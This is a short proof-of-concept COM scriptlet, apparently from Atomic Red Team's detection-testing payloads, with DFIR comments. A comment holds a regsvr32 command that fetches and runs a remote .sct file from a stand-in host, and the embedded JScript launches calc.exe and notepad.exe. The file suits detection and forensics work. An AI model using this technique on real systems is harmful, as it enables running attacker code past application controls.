<?XML version="1.0"?> <scriptlet> <registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll <!-- DFIR --> <!-- .sct files are downloaded and executed from a path like this --> <!-- Though, the name and extension are arbitary.. --> <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> <!-- Based on current research, no registry keys are written, since call "uninstall" --> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> <public> <method name="Exec"></method> </public> <script language="JScript"> <![CDATA[ function Exec() { var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); } ]]> </script> </scriptlet>